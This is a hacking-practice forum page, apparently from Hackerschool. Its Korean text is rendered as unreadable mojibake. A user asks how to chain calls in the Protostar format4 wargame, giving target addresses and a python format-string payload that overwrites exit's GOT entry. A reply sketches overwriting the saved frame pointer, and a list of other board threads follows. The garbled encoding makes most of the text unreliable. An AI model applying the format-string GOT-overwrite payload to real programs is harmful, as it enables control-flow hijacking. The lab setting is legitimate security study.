½Ã½ºÅÛ ÇØÅ·

 1574, 17/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   tkakr7458
   format string bug + got overwite

http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=1864 [º¹»ç]


ÈåÀ¸.. »çÁøÀ» ¸ø¿Ã·Á¼­ ¼³¸íÇϱâ Èûµå³×¿ä ¤Ð¤Ð

https://exploit-exercises.com/protostar/format4/

À§ ÁÖ¼Ò´Â ¼Ò½º À̱¸¿ä

exit ¸¦ hello À¸·Î overwite ÇÒ¶ó°í ÇÕ´Ï´Ù.

hello = 0x080484b4 ÀÌ°í
exit@got = 0x8049718 ÀÔ´Ï´Ù.

format offsetÀº 4 ÀÔ´Ï´Ù. ( "AAAA %x%x%x%x" ÇßÀ»¶§ 4 ¹ø°¿¡ ³ª¿È)

(python -c 'print "\x18\x97\x04\x08"+"134513840%x"+"%4$n")
                                exit@got                helleÁ¤¼ö-4

ÀÌ·±½ÄÀ¸·Î Çϸé overwite°¡ µÇ´Â°ÍÀº ¾Ë°Ú´Âµ¥ ¿¬¼ÓÇؼ­ hello¸¦ È£ÃâÇÏ´Â ¹æ¹ýÀ» ¸ô¸£°Ú½À´Ï´Ù. µµ¿ÍÁֽʼî¤Ð¤Ð
  Hit : 2476     Date : 2017/04/19 08:28


    
ÇØÄð·¯ ÀÌ ¹®Á¦ ÀÚüÀÇ Àǵµ´Â hello¸¦ Çѹø¸¸ È£ÃâÇ϶õ°Çµ¥, hello¿¡ _exitÀÌ À־ ¾îÂ÷ÇÇ hello°£´ÙÀ½¿¡ Á¾·áÇÏ°ÚÁö¸¸ ¸¸¾à¿¡ ¾ø´Â »óȲ¿¡¼­ ¿¬¼ÓÇؼ­ È£ÃâÇÏ´Â ¹æ¹ýÀº ½ºÅÃÀ» µ¤¾î¾ß ÇÕ´Ï´Ù
exitÇÔ¼öÀÇ GOT¸¦ ÀÎÀÚ 1À» ¹Þ¾Æµµ Á¤»óÁøÇàÇÏ´Â ÇÔ¼ö ¿¹¸¦µé¾î execve·Î µ¤°í(execve´Â ÀÎÀÚ°¡ À߸øµÇµµ ÇÁ·Î±×·¥ÀÌ Á¾·áµÇÁö ¾Ê½À´Ï´Ù)
±×´ÙÀ½¿¡ sfpÀÇ Æ÷ÀÎÅ͸¦ ã½À´Ï´Ù, Áï mainÇÔ¼öÀÇ sfp¸¦ vulnÇÔ¼öÀÇ sfp°¡ °¡¸£Å°°í ÀÖÀ¸´Ï vulnÇÔ¼öÀÇ sfp¿¡ %nÀ¸·Î ÁÖ¼Ò¸¦ µ¤¾î¼­ mainÇÔ¼öÀÇ retºÎÅÍ Âß ÆäÀ̷ε带 fsb·Î µ¤À¸¸é fsb·Îµµ call chainingÀ» ÇÒ ¼ö ÀÖ½À´Ï´Ù		 2017/04/20  
ÇØÄð·¯ http://www.hackerschool.org/Sub_Html/HS_Posting/?uid=38 2017/04/20  
tkakr7458 °¨»çÇÕ´Ï´Ù. ¤Ð¤Ð 2017/04/20  
1254   gcc 2.96½ºÅñ¸Á¶ÀÇ º¯È­ ¾î¶»°Ô ¾Ë ¼ö ÀÖ³ª¿ä?[4]     topnons
 01/02 3485
1253   »çÀ̹ö¼ö»ç´ëÁú¹®Á¡[1]     tolta
 01/13 3244
1252   ¶Ç Áú¹®ÇÔ[1]     tolta
 04/19 3021
1251   ¶Ç »çÀ̹ö¼ö»ç´ë Áú¹®Á¡¿© ¤»....[2]     tolta
 01/15 3142
1250   Áú¹®Á»ÇÏ°Ù½À´Ï´Ù[4]     tolta
 02/25 3417
1249   NC¼ÒÇÁÆ®¸¦ »ó´ë·Î ¼Ò¼Û ÁغñÁß¿¡ ÀÖ½À´Ï´Ù.      TOGEACE
 12/09 3394
1248   ¸¹Àº´äº¯¹Ù¶÷´Ï´Ù...[4]     tnvlfdl1
 03/09 3191
1247   ¾Æ ¹ÌÃĹö¸®³×-.-[2]     tlsdbcjs
 03/31 3813
1246   À¥ÇØÅ· ½ÎÀÌÆ® ÀÖ³ª¿ä?[3]     tlsdbcjs
 03/09 4563
1245   °£´ÜÇÑ Áú¹®Á»...[1]     tlqaksqhr
 12/06 3163
1244   rop ´ÙÀ½¿¡ ¹¹¸¦ °øºÎÇÏ´Â°Ô ÁÁÀ»±î¿ä?[1]     tloet
 08/26 2099
1243   µµ¿ÍÁÖ¼¼¿ä~[1]     tkfkwufk
 06/18 3281
1242   pwntools ¸¦ ÀÌ¿ëÇÑ Àͽº Áú¹®[6]     tkakr7458
 04/16 7430
  format string bug + got overwite[3]     tkakr7458
 04/19 2475
1240   ½©Äڵ带 ÀÌ¿ëÇؼ­ bof ¸¦ ÇÒ¶§[4]     tkakr7458
 05/22 2742
1239   ÇØÄ¿½ºÄð¿¡¼­ Á¦°øÇÏ´Â BOF º¸°í ÇÏ´øµµÁß Áú¹®ÀÔ´Ï´Ù.     tjzmfls
 10/11 2905
1238   Áú¹®ÀÌÀÖ¾î¿ä!![4]     tjdqlsd234
 10/09 3134
1237   Àú±â¿ä ÇØÅ· ÇÒ¶§¿ä[3]     tjdkstn
 02/07 3501
1236   ´ëÇб³¶õ ½Ã½ºÅÛÇØÅ· 21°­ºÎÅÍ 26°­ ¸øµé¾î°¡°ÔÇسù³×¿ä[6]     tjddnr0306
 05/24 3817
1235   ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ BOF °ø°Ý½Ã Àǹ®Á¡ Áú¹®ÀÔ´Ï´Ù.[5]     tjdalstjr938
 01/02 2416
[1]..[11][12][13][14][15][16] 17 [18][19][20]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org